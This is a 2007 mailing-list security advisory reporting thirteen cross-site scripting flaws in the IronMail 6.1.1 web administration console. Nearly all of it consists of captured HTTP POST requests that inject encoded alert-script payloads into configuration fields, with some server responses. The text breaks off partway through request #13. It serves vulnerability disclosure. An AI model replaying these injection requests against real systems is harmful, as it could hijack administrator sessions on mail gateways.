Multiple XSS in IronMail Mar 26 2007 09:23AM
Javier Olascoaga (deese spezialk net)
Founded multiple XSS in IronMail.

See attached advisory. Spanish version in http://www.514.es.

Regards,

- J
===============================
- Advisory -
===============================

Título: Multipls XSS in Cypherstrust Ironmail 6.1.1
Risk: Medium
Date: 20.Feb.2007
Author: Javier Olascoaga <jolascoaga *at* 514.es>
WEB: http://www.514.es/

.: [ INTRO ] :.

IronMail protects enterprise email systems from inbound threats: spam, viruses;
or hackers trying to take down or take over the e-mail system. IronMail protects
enterprise email systems from outbound threats: regulatory compliance violations
, corporate policy violations, or theft ("leakage") of confidential information
or intellectual property. IronMail protects enterprise email systems from threats that haven't even been identified yet.

.: [ TECHNICAL DESCRIPTION ] :.

During the development of the technical tests against the IronMail mail system
have been detected several Cross Site Scripting vulnerabilities in the
administration console of the product.

Next you can find the XSS founded:

.: [ XSS #1 ] :.

POST https://172.0.0.2:10443/admin/systemRouting.do?method=submit HTTP/1.1
Referer:
https://172.0.0.2:10443/admin/systemRouting.do?method=init&isMenuToggled
=1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 295
Cache-Control: no-cache
Cookie: CTSecureToken=53DFBE4753D221B2707050E96902E98D_admin;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemRouting.do%3Fmet
hod%3Dinit%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C; tabbedMenuSelected=11;
/admin/queueManager.dofirsttimeload=1; /admin/queueManager.do=;
JSESSIONID=B227892A258E91419C09469E49AED4D4
'rows%5B0%5D.networkId=172.16.0.0&rows%5B0%5D.netmaskId=255.255.0.0&rows
%5B1%5D.networkId=192.168.0.0&rows%5B1%5D.netmaskId=255.255.0.0&network=
%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&netmask=128.0.0.0&
defRouterIp=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&submi
t=Submit

.: [ XSS #2 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/system_IronMail.do?method=getDetail&isMenu
Toggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 343
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fm
ethod%3DgetDetail%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
Wmtu=1500&hostName=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E
&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defau
ltRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.ni
st.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&et
hernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:11:46 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #3 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 341
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fm
ethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
Umtu=1500&hostName=mmail11&domainName=%27%3E%3Cscript%3Ealert%28%27SIA%2
7%29%3C%2Fscript%3E&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&default
Router=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist
.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethe
rnetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:26 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #4 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 337
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fm
ethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
Qmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=%27%3E%3Cscrip
t%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ipNetMask=255.255.255.224&defaul
tRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nis
t.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadridð
ernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:31 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #5 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 337
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fm
ethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
Qmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNet
Mask=255.255.255.224&defaultRouter=%27%3E%3Cscript%3Ealert%28%27SIA%27%2
9%3C%2Fscript%3E&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nis
t.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadridð
ernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:36 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #6 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 338
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fm
ethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
Rmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNet
Mask=255.255.255.224&defaultRouter=10.1.1.2&dns1=%27%3E%3Cscript%3Ealert
%28%27SIA%27%29%3C%2Fscript%3E&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nis
t.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadridð
ernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:41 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #7 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 340
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fm
ethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
Tmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNet
Mask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=%27%3E%3C
script%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns3=10.1.1.5&ntp1=time.nis
t.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadridð
ernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:48 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #8 ] :.

POST https://172.0.0.2:10443/admin/systemOutOfBand.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemOutOfBand.do?method=getDetail&isMenu
Toggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 154
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemOutOfBand.do%3Fm
ethod%3DgetDetail%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
outOfBand=true&mtu=1500&ipAddress=%27%3E%3Cscript%3Ealert%28%27SIA%27%29
%3C%2Fscript%3E&ethernetSetting=autoselect&ipNetMask=255.255.255.224&sub
mit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:13:16 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #9 ] :.

POST https://172.0.0.2:10443/admin/systemBackup.do?method=submit HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemBackup.do?method=init&isMenuToggled=
1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 146
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemBackup.do%3Fmeth
od%3Dinit%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
password=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&confirmPa
ssword=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=Subm
it
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:13:41 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #10 ] :.

POST https://172.0.0.2:10443/admin/systemLicenseManager.do?method=submit
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemLicenseManager.do?method=init&isMenu
Toggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 75
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemLicenseManager.d
o%3Fmethod%3Dinit%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
Klicense=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=Su
bmit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:20:28 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #11 ] :.

POST https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=init&isMenu
Toggled=1&procId=90
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 1225
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=15;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemWebAdminConfig.d
o%3Fmethod%3Dinit%26isMenuToggled%3D1%26procId%3D90;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc
ountMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=90&rows%5B0%5D.attrName=gui_log_level&rows%5B0%5D.attrType=12&row
s%5B0%5D.attrValidate=%5BLabelValueBean%5BCRITICAL%2C+1%5D%2C+LabelValue
Bean%5BERROR%2C+4%5D%2C+LabelValueBean%5BINFORMATION%2C+5%5D%2C+LabelVal
ueBean%5BDETAILED%2C+6%5D%5D&rows%5B0%5D.attrValidateStr=30060003%3A1%2C
30060004%3A4%2C30060005%3A5%2C30060006%3A6&rows%5B0%5D.attrDepends=&rows
%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValu
eStrClone=4&rows%5B0%5D.langTagId=2000003&rows%5B0%5D.attrValue=4&rows%5
B1%5D.attrName=gui_timeout&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValida
te=%5B1-30%5D&rows%5B1%5D.attrValidateStr=%5B1-30%5D&rows%5B1%5D.attrDep
ends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5
D.attrValueStrClone=30&rows%5B1%5D.langTagId=2001014&rows%5B1%5D.attrVal
ueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.
attrName=auto_refresh&rows%5B2%5D.attrType=2&rows%5B2%5D.attrValidate=%5
B1-30%5D&rows%5B2%5D.attrValidateStr=%5B1-30%5D&rows%5B2%5D.attrDepends=
&rows%5B2%5D.multipleValue=0&rows%5B2%5D.modifyable=true&rows%5B2%5D.att
rValueStrClone=4&rows%5B2%5D.langTagId=2001017&rows%5B2%5D.attrValueStr=
%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&submitValue=Submi
t
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:21:27 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #12 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=
save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=
init&procId=164
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2840
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceP
roperties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc
ountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD
APConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B
0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows
%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=
true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows
%5B0%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%
3E&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5
B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&r
ows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyab
le=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&r
ows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B
2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&r
ows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyab
le=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&row
s%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attr
Type=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5
D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&r
ows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D
.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attr
Type=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%
5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%
5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId
=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_in
tvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B
5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.m
ultipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone
=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.
attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidat
e=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%
5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+
3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%
5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMAT
ION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2
C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A
6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&ro
ws%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.la
ngTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_
aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.at
trValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows
%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.lang
TagId=2016408&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:22:51 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #13 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=
save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=
save
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2840
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceP
roperties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc
ountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD
APConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B
0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows
%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=
true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows
%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1
%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrVali
dateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0
&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5
D.langTagId=2016402&rows%5B1%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%
27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.attrName=sync_rules_order&rows%5B
2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&r
ows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyab
le=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&row
s%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attr
Type=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5
D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&r
ows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D
.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attr
Type=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%
5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%
5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId
=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_in
tvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B
5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.m
ultipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone
=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.
attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidat
e=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%
5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+
